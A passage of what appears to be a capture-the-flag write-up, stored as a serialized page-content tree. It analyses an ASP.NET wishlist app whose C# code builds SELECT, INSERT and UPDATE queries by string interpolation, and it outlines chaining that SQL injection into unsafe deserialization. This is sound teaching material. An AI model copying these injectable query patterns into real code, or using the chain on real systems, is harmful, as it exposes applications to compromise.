style":1576},[35518],{"type":38,"value":35127},{"type":33,"tag":128,"props":35520,"children":35521},{"style":135},[35522],{"type":38,"value":35523}," sqlQueryProduct",{"type":33,"tag":128,"props":35525,"children":35526},{"style":312},[35527],{"type":38,"value":5657},{"type":33,"tag":128,"props":35529,"children":35530},{"style":676},[35531],{"type":38,"value":35201},{"type":33,"tag":128,"props":35533,"children":35534},{"style":140},[35535],{"type":38,"value":35536},"SELECT * from Products WHERE name='",{"type":33,"tag":128,"props":35538,"children":35539},{"style":312},[35540],{"type":38,"value":7246},{"type":33,"tag":128,"props":35542,"children":35543},{"style":140},[35544],{"type":38,"value":12126},{"type":33,"tag":128,"props":35546,"children":35547},{"style":312},[35548],{"type":38,"value":5730},{"type":33,"tag":128,"props":35550,"children":35551},{"style":140},[35552],{"type":38,"value":35553},"' AND sellerName='",{"type":33,"tag":128,"props":35555,"children":35556},{"style":312},[35557],{"type":38,"value":7246},{"type":33,"tag":128,"props":35559,"children":35560},{"style":140},[35561],{"type":38,"value":35562},"sellerName",{"type":33,"tag":128,"props":35564,"children":35565},{"style":312},[35566],{"type":38,"value":5730},{"type":33,"tag":128,"props":35568,"children":35569},{"style":140},[35570],{"type":38,"value":6040},{"type":33,"tag":128,"props":35572,"children":35573},{"style":676},[35574],{"type":38,"value":669},{"type":33,"tag":128,"props":35576,"children":35577},{"style":312},[35578],{"type":38,"value":35231},{"type":33,"tag":128,"props":35580,"children":35581},{"style":5541},[35582],{"type":38,"value":35236},{"type":33,"tag":128,"props":35584,"children":35585},{"class":130,"line":1076},[35586,35590,35595,35599,35603,35607,35612,35616,35620,35624,35629,35633,35637],{"type":33,"tag":128,"props":35587,"children":35588},{"style":300},[35589],{"type":38,"value":35457},{"type":33,"tag":128,"props":35591,"children":35592},{"style":135},[35593],{"type":38,"value":35594}," product",{"type":33,"tag":128,"props":35596,"children":35597},{"style":312},[35598],{"type":38,"value":5657},{"type":33,"tag":128,"props":35600,"children":35601},{"style":306},[35602],{"type":38,"value":35471},{"type":33,"tag":128,"props":35604,"children":35605},{"style":312},[35606],{"type":38,"value":215},{"type":33,"tag":128,"props":35608,"children":35609},{"style":306},[35610],{"type":38,"value":35611},"Products",{"type":33,"tag":128,"props":35613,"children":35614},{"style":312},[35615],{"type":38,"value":215},{"type":33,"tag":128,"props":35617,"children":35618},{"style":135},[35619],{"type":38,"value":35489},{"type":33,"tag":128,"props":35621,"children":35622},{"style":312},[35623],{"type":38,"value":5566},{"type":33,"tag":128,"props":35625,"children":35626},{"style":306},[35627],{"type":38,"value":35628},"sqlQueryProduct",{"type":33,"tag":128,"props":35630,"children":35631},{"style":312},[35632],{"type":38,"value":6700},{"type":33,"tag":128,"props":35634,"children":35635},{"style":135},[35636],{"type":38,"value":35507},{"type":33,"tag":128,"props":35638,"children":35639},{"style":312},[35640],{"type":38,"value":15496},{"type":33,"tag":128,"props":35642,"children":35643},{"class":130,"line":1089},[35644,35648,35652,35656,35660,35664,35669,35673,35678,35682,35686],{"type":33,"tag":128,"props":35645,"children":35646},{"style":1576},[35647],{"type":38,"value":6625},{"type":33,"tag":128,"props":35649,"children":35650},{"style":312},[35651],{"type":38,"value":5566},{"type":33,"tag":128,"props":35653,"children":35654},{"style":300},[35655],{"type":38,"value":16424},{"type":33,"tag":128,"props":35657,"children":35658},{"style":1576},[35659],{"type":38,"value":35317},{"type":33,"tag":128,"props":35661,"children":35662},{"style":312},[35663],{"type":38,"value":215},{"type":33,"tag":128,"props":35665,"children":35666},{"style":135},[35667],{"type":38,"value":35668},"IsNullOrEmpty",{"type":33,"tag":128,"props":35670,"children":35671},{"style":312},[35672],{"type":38,"value":5566},{"type":33,"tag":128,"props":35674,"children":35675},{"style":306},[35676],{"type":38,"value":35677},"product",{"type":33,"tag":128,"props":35679,"children":35680},{"style":312},[35681],{"type":38,"value":215},{"type":33,"tag":128,"props":35683,"children":35684},{"style":306},[35685],{"type":38,"value":12126},{"type":33,"tag":128,"props":35687,"children":35688},{"style":312},[35689],{"type":38,"value":2459},{"type":33,"tag":128,"props":35691,"children":35692},{"class":130,"line":1101},[35693],{"type":33,"tag":128,"props":35694,"children":35695},{"style":312},[35696],{"type":38,"value":12699},{"type":33,"tag":128,"props":35698,"children":35699},{"class":130,"line":1114},[35700,35704,35708,35713,35718,35723,35727,35732,35736,35740,35744,35748,35752,35756,35760],{"type":33,"tag":128,"props":35701,"children":35702},{"style":1576},[35703],{"type":38,"value":15223},{"type":33,"tag":128,"props":35705,"children":35706},{"style":312},[35707],{"type":38,"value":2852},{"type":33,"tag":128,"props":35709,"children":35710},{"style":306},[35711],{"type":38,"value":35712},"wishlist",{"type":33,"tag":128,"props":35714,"children":35715},{"style":300},[35716],{"type":38,"value":35717}," !=",{"type":33,"tag":128,"props":35719,"children":35720},{"style":300},[35721],{"type":38,"value":35722}," null",{"type":33,"tag":128,"props":35724,"children":35725},{"style":300},[35726],{"type":38,"value":10037},{"type":33,"tag":128,"props":35728,"children":35729},{"style":300},[35730],{"type":38,"value":35731}," !",{"type":33,"tag":128,"props":35733,"children":35734},{"style":1576},[35735],{"type":38,"value":35317},{"type":33,"tag":128,"props":35737,"children":35738},{"style":312},[35739],{"type":38,"value":215},{"type":33,"tag":128,"props":35741,"children":35742},{"style":135},[35743],{"type":38,"value":35668},{"type":33,"tag":128,"props":35745,"children":35746},{"style":312},[35747],{"type":38,"value":5566},{"type":33,"tag":128,"props":35749,"children":35750},{"style":306},[35751],{"type":38,"value":35712},{"type":33,"tag":128,"props":35753,"children":35754},{"style":312},[35755],{"type":38,"value":215},{"type":33,"tag":128,"props":35757,"children":35758},{"style":306},[35759],{"type":38,"value":2815},{"type":33,"tag":128,"props":35761,"children":35762},{"style":312},[35763],{"type":38,"value":2459},{"type":33,"tag":128,"props":35765,"children":35766},{"class":130,"line":1127},[35767],{"type":33,"tag":128,"props":35768,"children":35769},{"style":312},[35770],{"type":38,"value":35771}," {\n",{"type":33,"tag":128,"props":35773,"children":35774},{"class":130,"line":1139},[35775,35780,35784,35789,35793,35798,35802,35807,35811,35816,35820,35824,35828,35832],{"type":33,"tag":128,"props":35776,"children":35777},{"style":30339},[35778],{"type":38,"value":35779}," List",{"type":33,"tag":128,"props":35781,"children":35782},{"style":312},[35783],{"type":38,"value":5977},{"type":33,"tag":128,"props":35785,"children":35786},{"style":30339},[35787],{"type":38,"value":35788},"ProductModel",{"type":33,"tag":128,"props":35790,"children":35791},{"style":312},[35792],{"type":38,"value":6054},{"type":33,"tag":128,"props":35794,"children":35795},{"style":135},[35796],{"type":38,"value":35797}," products",{"type":33,"tag":128,"props":35799,"children":35800},{"style":312},[35801],{"type":38,"value":5657},{"type":33,"tag":128,"props":35803,"children":35804},{"style":306},[35805],{"type":38,"value":35806}," SerializeHelper",{"type":33,"tag":128,"props":35808,"children":35809},{"style":312},[35810],{"type":38,"value":215},{"type":33,"tag":128,"props":35812,"children":35813},{"style":135},[35814],{"type":38,"value":35815},"Deserialize",{"type":33,"tag":128,"props":35817,"children":35818},{"style":312},[35819],{"type":38,"value":5566},{"type":33,"tag":128,"props":35821,"children":35822},{"style":306},[35823],{"type":38,"value":35712},{"type":33,"tag":128,"props":35825,"children":35826},{"style":312},[35827],{"type":38,"value":215},{"type":33,"tag":128,"props":35829,"children":35830},{"style":306},[35831],{"type":38,"value":2815},{"type":33,"tag":128,"props":35833,"children":35834},{"style":312},[35835],{"type":38,"value":5815},{"type":33,"tag":128,"props":35837,"children":35838},{"class":130,"line":1152},[35839,35844,35849,35853,35857,35861,35866,35870,35874,35878,35883,35887,35891,35895,35899,35903,35907],{"type":33,"tag":128,"props":35840,"children":35841},{"style":30339},[35842],{"type":38,"value":35843}," ProductModel",{"type":33,"tag":128,"props":35845,"children":35846},{"style":135},[35847],{"type":38,"value":35848}," result",{"type":33,"tag":128,"props":35850,"children":35851},{"style":312},[35852],{"type":38,"value":5657},{"type":33,"tag":128,"props":35854,"children":35855},{"style":306},[35856],{"type":38,"value":35797},{"type":33,"tag":128,"props":35858,"children":35859},{"style":312},[35860],{"type":38,"value":215},{"type":33,"tag":128,"props":35862,"children":35863},{"style":135},[35864],{"type":38,"value":35865},"Find",{"type":33,"tag":128,"props":35867,"children":35868},{"style":312},[35869],{"type":38,"value":5566},{"type":33,"tag":128,"props":35871,"children":35872},{"style":135},[35873],{"type":38,"value":32413},{"type":33,"tag":128,"props":35875,"children":35876},{"style":300},[35877],{"type":38,"value":5625},{"type":33,"tag":128,"props":35879,"children":35880},{"style":306},[35881],{"type":38,"value":35882}," x",{"type":33,"tag":128,"props":35884,"children":35885},{"style":312},[35886],{"type":38,"value":215},{"type":33,"tag":128,"props":35888,"children":35889},{"style":306},[35890],{"type":38,"value":12126},{"type":33,"tag":128,"props":35892,"children":35893},{"style":300},[35894],{"type":38,"value":11001},{"type":33,"tag":128,"props":35896,"children":35897},{"style":306},[35898],{"type":38,"value":35594},{"type":33,"tag":128,"props":35900,"children":35901},{"style":312},[35902],{"type":38,"value":215},{"type":33,"tag":128,"props":35904,"children":35905},{"style":306},[35906],{"type":38,"value":12126},{"type":33,"tag":128,"props":35908,"children":35909},{"style":312},[35910],{"type":38,"value":5815},{"type":33,"tag":128,"props":35912,"children":35913},{"class":130,"line":1165},[35914],{"type":33,"tag":128,"props":35915,"children":35916},{"emptyLinePlaceholder":896},[35917],{"type":38,"value":899},{"type":33,"tag":128,"props":35919,"children":35920},{"class":130,"line":1177},[35921,35926,35930,35935,35939,35943],{"type":33,"tag":128,"props":35922,"children":35923},{"style":1576},[35924],{"type":38,"value":35925}," if",{"type":33,"tag":128,"props":35927,"children":35928},{"style":312},[35929],{"type":38,"value":2852},{"type":33,"tag":128,"props":35931,"children":35932},{"style":306},[35933],{"type":38,"value":35934},"result",{"type":33,"tag":128,"props":35936,"children":35937},{"style":300},[35938],{"type":38,"value":35717},{"type":33,"tag":128,"props":35940,"children":35941},{"style":300},[35942],{"type":38,"value":35722},{"type":33,"tag":128,"props":35944,"children":35945},{"style":312},[35946],{"type":38,"value":2427},{"type":33,"tag":128,"props":35948,"children":35949},{"class":130,"line":1189},[35950],{"type":33,"tag":128,"props":35951,"children":35952},{"style":312},[35953],{"type":38,"value":35954}," {\n",{"type":33,"tag":128,"props":35956,"children":35957},{"class":130,"line":1202},[35958,35963,35968,35972,35976,35981,35985],{"type":33,"tag":128,"props":35959,"children":35960},{"style":1576},[35961],{"type":38,"value":35962}," return",{"type":33,"tag":128,"props":35964,"children":35965},{"style":135},[35966],{"type":38,"value":35967}," Content",{"type":33,"tag":128,"props":35969,"children":35970},{"style":312},[35971],{"type":38,"value":5566},{"type":33,"tag":128,"props":35973,"children":35974},{"style":676},[35975],{"type":38,"value":669},{"type":33,"tag":128,"props":35977,"children":35978},{"style":140},[35979],{"type":38,"value":35980},"Product already exists",{"type":33,"tag":128,"props":35982,"children":35983},{"style":676},[35984],{"type":38,"value":669},{"type":33,"tag":128,"props":35986,"children":35987},{"style":312},[35988],{"type":38,"value":5815},{"type":33,"tag":128,"props":35990,"children":35991},{"class":130,"line":1214},[35992],{"type":33,"tag":128,"props":35993,"children":35994},{"style":312},[35995],{"type":38,"value":35996}," }\n",{"type":33,"tag":128,"props":35998,"children":35999},{"class":130,"line":1226},[36000],{"type":33,"tag":128,"props":36001,"children":36002},{"emptyLinePlaceholder":896},[36003],{"type":38,"value":899},{"type":33,"tag":128,"props":36005,"children":36006},{"class":130,"line":1239},[36007,36012,36016,36021,36025,36029],{"type":33,"tag":128,"props":36008,"children":36009},{"style":306},[36010],{"type":38,"value":36011}," products",{"type":33,"tag":128,"props":36013,"children":36014},{"style":312},[36015],{"type":38,"value":215},{"type":33,"tag":128,"props":36017,"children":36018},{"style":135},[36019],{"type":38,"value":36020},"Add",{"type":33,"tag":128,"props":36022,"children":36023},{"style":312},[36024],{"type":38,"value":5566},{"type":33,"tag":128,"props":36026,"children":36027},{"style":306},[36028],{"type":38,"value":35677},{"type":33,"tag":128,"props":36030,"children":36031},{"style":312},[36032],{"type":38,"value":5815},{"type":33,"tag":128,"props":36034,"children":36035},{"class":130,"line":1251},[36036,36041,36046,36050,36054,36058,36063,36067,36072],{"type":33,"tag":128,"props":36037,"children":36038},{"style":1576},[36039],{"type":38,"value":36040}," string",{"type":33,"tag":128,"props":36042,"children":36043},{"style":135},[36044],{"type":38,"value":36045}," serializedData",{"type":33,"tag":128,"props":36047,"children":36048},{"style":312},[36049],{"type":38,"value":5657},{"type":33,"tag":128,"props":36051,"children":36052},{"style":306},[36053],{"type":38,"value":35806},{"type":33,"tag":128,"props":36055,"children":36056},{"style":312},[36057],{"type":38,"value":215},{"type":33,"tag":128,"props":36059,"children":36060},{"style":135},[36061],{"type":38,"value":36062},"Serialize",{"type":33,"tag":128,"props":36064,"children":36065},{"style":312},[36066],{"type":38,"value":5566},{"type":33,"tag":128,"props":36068,"children":36069},{"style":306},[36070],{"type":38,"value":36071},"products",{"type":33,"tag":128,"props":36073,"children":36074},{"style":312},[36075],{"type":38,"value":5815},{"type":33,"tag":128,"props":36077,"children":36078},{"class":130,"line":1263},[36079,36083,36088,36092,36096,36101,36105,36110,36114,36119,36123,36127,36131,36135,36139],{"type":33,"tag":128,"props":36080,"children":36081},{"style":1576},[36082],{"type":38,"value":36040},{"type":33,"tag":128,"props":36084,"children":36085},{"style":135},[36086],{"type":38,"value":36087}," sqlQueryAddWishlist",{"type":33,"tag":128,"props":36089,"children":36090},{"style":312},[36091],{"type":38,"value":5657},{"type":33,"tag":128,"props":36093,"children":36094},{"style":676},[36095],{"type":38,"value":35201},{"type":33,"tag":128,"props":36097,"children":36098},{"style":140},[36099],{"type":38,"value":36100},"UPDATE Wishlist SET data='",{"type":33,"tag":128,"props":36102,"children":36103},{"style":312},[36104],{"type":38,"value":7246},{"type":33,"tag":128,"props":36106,"children":36107},{"style":140},[36108],{"type":38,"value":36109},"serializedData",{"type":33,"tag":128,"props":36111,"children":36112},{"style":312},[36113],{"type":38,"value":5730},{"type":33,"tag":128,"props":36115,"children":36116},{"style":140},[36117],{"type":38,"value":36118},"' WHERE ID=",{"type":33,"tag":128,"props":36120,"children":36121},{"style":312},[36122],{"type":38,"value":7246},{"type":33,"tag":128,"props":36124,"children":36125},{"style":140},[36126],{"type":38,"value":35163},{"type":33,"tag":128,"props":36128,"children":36129},{"style":312},[36130],{"type":38,"value":5730},{"type":33,"tag":128,"props":36132,"children":36133},{"style":676},[36134],{"type":38,"value":669},{"type":33,"tag":128,"props":36136,"children":36137},{"style":312},[36138],{"type":38,"value":35231},{"type":33,"tag":128,"props":36140,"children":36141},{"style":5541},[36142],{"type":38,"value":35236},{"type":33,"tag":128,"props":36144,"children":36145},{"class":130,"line":1276},[36146,36151,36155,36160,36164,36169,36173,36178],{"type":33,"tag":128,"props":36147,"children":36148},{"style":306},[36149],{"type":38,"value":36150}," _db",{"type":33,"tag":128,"props":36152,"children":36153},{"style":312},[36154],{"type":38,"value":215},{"type":33,"tag":128,"props":36156,"children":36157},{"style":306},[36158],{"type":38,"value":36159},"Database",{"type":33,"tag":128,"props":36161,"children":36162},{"style":312},[36163],{"type":38,"value":215},{"type":33,"tag":128,"props":36165,"children":36166},{"style":135},[36167],{"type":38,"value":36168},"ExecuteSqlRaw",{"type":33,"tag":128,"props":36170,"children":36171},{"style":312},[36172],{"type":38,"value":5566},{"type":33,"tag":128,"props":36174,"children":36175},{"style":306},[36176],{"type":38,"value":36177},"sqlQueryAddWishlist",{"type":33,"tag":128,"props":36179,"children":36180},{"style":312},[36181],{"type":38,"value":5815},{"type":33,"tag":128,"props":36183,"children":36184},{"class":130,"line":1288},[36185],{"type":33,"tag":128,"props":36186,"children":36187},{"style":312},[36188],{"type":38,"value":15318},{"type":33,"tag":128,"props":36190,"children":36191},{"class":130,"line":1300},[36192],{"type":33,"tag":128,"props":36193,"children":36194},{"style":1576},[36195],{"type":38,"value":36196}," else\n",{"type":33,"tag":128,"props":36198,"children":36199},{"class":130,"line":1313},[36200],{"type":33,"tag":128,"props":36201,"children":36202},{"style":312},[36203],{"type":38,"value":35771},{"type":33,"tag":128,"props":36205,"children":36206},{"class":130,"line":1327},[36207,36211,36216,36220,36224,36228,36232,36236,36240,36244,36248,36252,36256],{"type":33,"tag":128,"props":36208,"children":36209},{"style":1576},[36210],{"type":38,"value":36040},{"type":33,"tag":128,"props":36212,"children":36213},{"style":135},[36214],{"type":38,"value":36215}," username",{"type":33,"tag":128,"props":36217,"children":36218},{"style":312},[36219],{"type":38,"value":5657},{"type":33,"tag":128,"props":36221,"children":36222},{"style":306},[36223],{"type":38,"value":35141},{"type":33,"tag":128,"props":36225,"children":36226},{"style":312},[36227],{"type":38,"value":215},{"type":33,"tag":128,"props":36229,"children":36230},{"style":306},[36231],{"type":38,"value":35150},{"type":33,"tag":128,"props":36233,"children":36234},{"style":312},[36235],{"type":38,"value":344},{"type":33,"tag":128,"props":36237,"children":36238},{"style":676},[36239],{"type":38,"value":669},{"type":33,"tag":128,"props":36241,"children":36242},{"style":140},[36243],{"type":38,"value":29798},{"type":33,"tag":128,"props":36245,"children":36246},{"style":676},[36247],{"type":38,"value":669},{"type":33,"tag":128,"props":36249,"children":36250},{"style":312},[36251],{"type":38,"value":8230},{"type":33,"tag":128,"props":36253,"children":36254},{"style":135},[36255],{"type":38,"value":35176},{"type":33,"tag":128,"props":36257,"children":36258},{"style":312},[36259],{"type":38,"value":15496},{"type":33,"tag":128,"props":36261,"children":36262},{"class":130,"line":11196},[36263,36267,36271,36275,36279,36284,36288,36292,36297,36301,36305],{"type":33,"tag":128,"props":36264,"children":36265},{"style":30339},[36266],{"type":38,"value":35779},{"type":33,"tag":128,"props":36268,"children":36269},{"style":312},[36270],{"type":38,"value":5977},{"type":33,"tag":128,"props":36272,"children":36273},{"style":30339},[36274],{"type":38,"value":35788},{"type":33,"tag":128,"props":36276,"children":36277},{"style":312},[36278],{"type":38,"value":6054},{"type":33,"tag":128,"props":36280,"children":36281},{"style":135},[36282],{"type":38,"value":36283}," wishListProducts",{"type":33,"tag":128,"props":36285,"children":36286},{"style":312},[36287],{"type":38,"value":5657},{"type":33,"tag":128,"props":36289,"children":36290},{"style":300},[36291],{"type":38,"value":13061},{"type":33,"tag":128,"props":36293,"children":36294},{"style":30339},[36295],{"type":38,"value":36296}," List",{"type":33,"tag":128,"props":36298,"children":36299},{"style":312},[36300],{"type":38,"value":5977},{"type":33,"tag":128,"props":36302,"children":36303},{"style":30339},[36304],{"type":38,"value":35788},{"type":33,"tag":128,"props":36306,"children":36307},{"style":312},[36308],{"type":38,"value":36309},">();\n",{"type":33,"tag":128,"props":36311,"children":36312},{"class":130,"line":11204},[36313,36318,36322,36326,36330,36334],{"type":33,"tag":128,"props":36314,"children":36315},{"style":306},[36316],{"type":38,"value":36317}," wishListProducts",{"type":33,"tag":128,"props":36319,"children":36320},{"style":312},[36321],{"type":38,"value":215},{"type":33,"tag":128,"props":36323,"children":36324},{"style":135},[36325],{"type":38,"value":36020},{"type":33,"tag":128,"props":36327,"children":36328},{"style":312},[36329],{"type":38,"value":5566},{"type":33,"tag":128,"props":36331,"children":36332},{"style":306},[36333],{"type":38,"value":35677},{"type":33,"tag":128,"props":36335,"children":36336},{"style":312},[36337],{"type":38,"value":5815},{"type":33,"tag":128,"props":36339,"children":36340},{"class":130,"line":11213},[36341,36345,36349,36353,36357,36361,36365,36369,36374],{"type":33,"tag":128,"props":36342,"children":36343},{"style":1576},[36344],{"type":38,"value":36040},{"type":33,"tag":128,"props":36346,"children":36347},{"style":135},[36348],{"type":38,"value":36045},{"type":33,"tag":128,"props":36350,"children":36351},{"style":312},[36352],{"type":38,"value":5657},{"type":33,"tag":128,"props":36354,"children":36355},{"style":306},[36356],{"type":38,"value":35806},{"type":33,"tag":128,"props":36358,"children":36359},{"style":312},[36360],{"type":38,"value":215},{"type":33,"tag":128,"props":36362,"children":36363},{"style":135},[36364],{"type":38,"value":36062},{"type":33,"tag":128,"props":36366,"children":36367},{"style":312},[36368],{"type":38,"value":5566},{"type":33,"tag":128,"props":36370,"children":36371},{"style":306},[36372],{"type":38,"value":36373},"wishListProducts",{"type":33,"tag":128,"props":36375,"children":36376},{"style":312},[36377],{"type":38,"value":5815},{"type":33,"tag":128,"props":36379,"children":36380},{"class":130,"line":11250},[36381,36385,36389,36393,36397,36402,36406,36410,36414,36419,36423,36427,36431,36436,36440,36444,36448,36453,36457,36461],{"type":33,"tag":128,"props":36382,"children":36383},{"style":1576},[36384],{"type":38,"value":36040},{"type":33,"tag":128,"props":36386,"children":36387},{"style":135},[36388],{"type":38,"value":36087},{"type":33,"tag":128,"props":36390,"children":36391},{"style":312},[36392],{"type":38,"value":5657},{"type":33,"tag":128,"props":36394,"children":36395},{"style":676},[36396],{"type":38,"value":35201},{"type":33,"tag":128,"props":36398,"children":36399},{"style":140},[36400],{"type":38,"value":36401},"INSERT INTO Wishlist(ID, username, data) VALUES(",{"type":33,"tag":128,"props":36403,"children":36404},{"style":312},[36405],{"type":38,"value":7246},{"type":33,"tag":128,"props":36407,"children":36408},{"style":140},[36409],{"type":38,"value":35163},{"type":33,"tag":128,"props":36411,"children":36412},{"style":312},[36413],{"type":38,"value":5730},{"type":33,"tag":128,"props":36415,"children":36416},{"style":140},[36417],{"type":38,"value":36418},",'",{"type":33,"tag":128,"props":36420,"children":36421},{"style":312},[36422],{"type":38,"value":7246},{"type":33,"tag":128,"props":36424,"children":36425},{"style":140},[36426],{"type":38,"value":29798},{"type":33,"tag":128,"props":36428,"children":36429},{"style":312},[36430],{"type":38,"value":5730},{"type":33,"tag":128,"props":36432,"children":36433},{"style":140},[36434],{"type":38,"value":36435},"', '",{"type":33,"tag":128,"props":36437,"children":36438},{"style":312},[36439],{"type":38,"value":7246},{"type":33,"tag":128,"props":36441,"children":36442},{"style":140},[36443],{"type":38,"value":36109},{"type":33,"tag":128,"props":36445,"children":36446},{"style":312},[36447],{"type":38,"value":5730},{"type":33,"tag":128,"props":36449,"children":36450},{"style":140},[36451],{"type":38,"value":36452},"')",{"type":33,"tag":128,"props":36454,"children":36455},{"style":676},[36456],{"type":38,"value":669},{"type":33,"tag":128,"props":36458,"children":36459},{"style":312},[36460],{"type":38,"value":35231},{"type":33,"tag":128,"props":36462,"children":36463},{"style":5541},[36464],{"type":38,"value":35236},{"type":33,"tag":128,"props":36466,"children":36467},{"class":130,"line":11270},[36468,36472,36476,36480,36484,36488,36492,36496],{"type":33,"tag":128,"props":36469,"children":36470},{"style":306},[36471],{"type":38,"value":36150},{"type":33,"tag":128,"props":36473,"children":36474},{"style":312},[36475],{"type":38,"value":215},{"type":33,"tag":128,"props":36477,"children":36478},{"style":306},[36479],{"type":38,"value":36159},{"type":33,"tag":128,"props":36481,"children":36482},{"style":312},[36483],{"type":38,"value":215},{"type":33,"tag":128,"props":36485,"children":36486},{"style":135},[36487],{"type":38,"value":36168},{"type":33,"tag":128,"props":36489,"children":36490},{"style":312},[36491],{"type":38,"value":5566},{"type":33,"tag":128,"props":36493,"children":36494},{"style":306},[36495],{"type":38,"value":36177},{"type":33,"tag":128,"props":36497,"children":36498},{"style":312},[36499],{"type":38,"value":5815},{"type":33,"tag":128,"props":36501,"children":36502},{"class":130,"line":11278},[36503],{"type":33,"tag":128,"props":36504,"children":36505},{"style":312},[36506],{"type":38,"value":15318},{"type":33,"tag":128,"props":36508,"children":36509},{"class":130,"line":11334},[36510,36514,36518,36522,36526,36531,36535],{"type":33,"tag":128,"props":36511,"children":36512},{"style":1576},[36513],{"type":38,"value":13615},{"type":33,"tag":128,"props":36515,"children":36516},{"style":135},[36517],{"type":38,"value":35967},{"type":33,"tag":128,"props":36519,"children":36520},{"style":312},[36521],{"type":38,"value":5566},{"type":33,"tag":128,"props":36523,"children":36524},{"style":676},[36525],{"type":38,"value":669},{"type":33,"tag":128,"props":36527,"children":36528},{"style":140},[36529],{"type":38,"value":36530},"Added",{"type":33,"tag":128,"props":36532,"children":36533},{"style":676},[36534],{"type":38,"value":669},{"type":33,"tag":128,"props":36536,"children":36537},{"style":312},[36538],{"type":38,"value":5815},{"type":33,"tag":128,"props":36540,"children":36541},{"class":130,"line":11375},[36542],{"type":33,"tag":128,"props":36543,"children":36544},{"style":312},[36545],{"type":38,"value":6760},{"type":33,"tag":128,"props":36547,"children":36548},{"class":130,"line":11383},[36549,36553,36557,36561,36565,36569,36573],{"type":33,"tag":128,"props":36550,"children":36551},{"style":1576},[36552],{"type":38,"value":6810},{"type":33,"tag":128,"props":36554,"children":36555},{"style":135},[36556],{"type":38,"value":35967},{"type":33,"tag":128,"props":36558,"children":36559},{"style":312},[36560],{"type":38,"value":5566},{"type":33,"tag":128,"props":36562,"children":36563},{"style":676},[36564],{"type":38,"value":669},{"type":33,"tag":128,"props":36566,"children":36567},{"style":140},[36568],{"type":38,"value":6970},{"type":33,"tag":128,"props":36570,"children":36571},{"style":676},[36572],{"type":38,"value":669},{"type":33,"tag":128,"props":36574,"children":36575},{"style":312},[36576],{"type":38,"value":5815},{"type":33,"tag":128,"props":36578,"children":36579},{"class":130,"line":11392},[36580],{"type":33,"tag":128,"props":36581,"children":36582},{"style":312},[36583],{"type":38,"value":854},{"type":33,"tag":47,"props":36585,"children":36586},{},[36587],{"type":38,"value":36588},"We can also see that SQL injections are present in select, insert, and update queries. The problem now is that the flag is not found in the database, so we need to use this SQL injection to our advantage to exploit another vulnerability. That's what we're going to see in the next section.",{"type":33,"tag":40,"props":36590,"children":36592},{"id":36591},"deserialization",[36593],{"type":38,"value":36594},"Deserialization",{"type":33,"tag":47,"props":36596,"children":36597},{},[36598],{"type":38,"value":36599},"Our first impression when discovering these SQLi was to exploit arbitrary file reading or remote code execution directly from an SQLi. However, since no SQLite module was loaded, we were unable to exploit this way.",{"type":33,"tag":47,"props":36601,"children":36602},{},[36603],{"type":38,"value":36604},"While navigating through the code, we can realize something quite peculiar, a serialization and deserialization is performed directly from the response of an SQL query.",{"type":33,"tag":114,"props":36606,"children":36607},{"lang":35074},[36608],{"type":33,"tag":119,"props":36609,"children":36611},{"code":36610,"language":35074,"meta":8,"className":35079,"style":8},"[HttpGet]\npublic IActionResult Wishlist()\n{\n string ID = HttpContext.Items[\"ID\"].ToString();\n string sqlQueryGetWishlist = $\"SELECT * from Wishlist WHERE ID='{ID}'\";\n var wishlist = _db.Wishlist.FromSqlRaw(sqlQueryGetWishlist).FirstOrDefault();\n\n if (wishlist != null && !string.IsNullOrEmpty(wishlist.data))\n {\n // Here we can see an deserialization directly from the database result\n List\u003CProductModel> products = SerializeHelper.Deserialize(wishlist.data);\n return View(products);\n\n }\n [...]\n}\n",[36612],{"type":33,"tag":105,"props":36613,"children":36614},{"__ignoreMap":8},[36615,36631,36650,36657,36712,36759,36814,36821,36884,36891,36899,36958,36982,36989,36996,37015],{"type":33,"tag":128,"props":36616,"children":36617},{"class":130,"line":131},[36618,36622,36627],{"type":33,"tag":128,"props":36619,"children":36620},{"style":312},[36621],{"type":38,"value":344},{"type":33,"tag":128,"props":36623,"children":36624},{"style":30339},[36625],{"type":38,"value":36626},"HttpGet",{"type":33,"tag":128,"props":36628,"children":36629},{"style":312},[36630],{"type":38,"value":3262},{"type":33,"tag":128,"props":36632,"children":36633},{"class":130,"line":362},[36634,36638,36642,36646],{"type":33,"tag":128,"props":36635,"children":36636},{"style":300},[36637],{"type":38,"value":25953},{"type":33,"tag":128,"props":36639,"children":36640},{"style":30339},[36641],{"type":38,"value":35103},{"type":33,"tag":128,"props":36643,"children":36644},{"style":135},[36645],{"type":38,"value":35108},{"type":33,"tag":128,"props":36647,"children":36648},{"style":312},[36649],{"type":38,"value":7857},{"type":33,"tag":128,"props":36651,"children":36652},{"class":130,"line":403},[36653],{"type":33,"tag":128,"props":36654,"children":36655},{"style":312},[36656],{"type":38,"value":650},{"type":33,"tag":128,"props":36658,"children":36659},{"class":130,"line":739},[36660,36664,36668,36672,36676,36680,36684,36688,36692,36696,36700,36704,36708],{"type":33,"tag":128,"props":36661,"children":36662},{"style":1576},[36663],{"type":38,"value":35127},{"type":33,"tag":128,"props":36665,"children":36666},{"style":135},[36667],{"type":38,"value":35132},{"type":33,"tag":128,"props":36669,"children":36670},{"style":312},[36671],{"type":38,"value":5657},{"type":33,"tag":128,"props":36673,"children":36674},{"style":306},[36675],{"type":38,"value":35141},{"type":33,"tag":128,"props":36677,"children":36678},{"style":312},[36679],{"type":38,"value":215},{"type":33,"tag":128,"props":36681,"children":36682},{"style":306},[36683],{"type":38,"value":35150},{"type":33,"tag":128,"props":36685,"children":36686},{"style":312},[36687],{"type":38,"value":344},{"type":33,"tag":128,"props":36689,"children":36690},{"style":676},[36691],{"type":38,"value":669},{"type":33,"tag":128,"props":36693,"children":36694},{"style":140},[36695],{"type":38,"value":35163},{"type":33,"tag":128,"props":36697,"children":36698},{"style":676},[36699],{"type":38,"value":669},{"type":33,"tag":128,"props":36701,"children":36702},{"style":312},[36703],{"type":38,"value":8230},{"type":33,"tag":128,"props":36705,"children":36706},{"style":135},[36707],{"type":38,"value":35176},{"type":33,"tag":128,"props":36709,"children":36710},{"style":312},[36711],{"type":38,"value":15496},{"type":33,"tag":128,"props":36713,"children":36714},{"class":130,"line":765},[36715,36719,36723,36727,36731,36735,36739,36743,36747,36751,36755],{"type":33,"tag":128,"props":36716,"children":36717},{"style":1576},[36718],{"type":38,"value":35127},{"type":33,"tag":128,"props":36720,"children":36721},{"style":135},[36722],{"type":38,"value":35192},{"type":33,"tag":128,"props":36724,"children":36725},{"style":312},[36726],{"type":38,"value":5657},{"type":33,"tag":128,"props":36728,"children":36729},{"style":676},[36730],{"type":38,"value":35201},{"type":33,"tag":128,"props":36732,"children":36733},{"style":140},[36734],{"t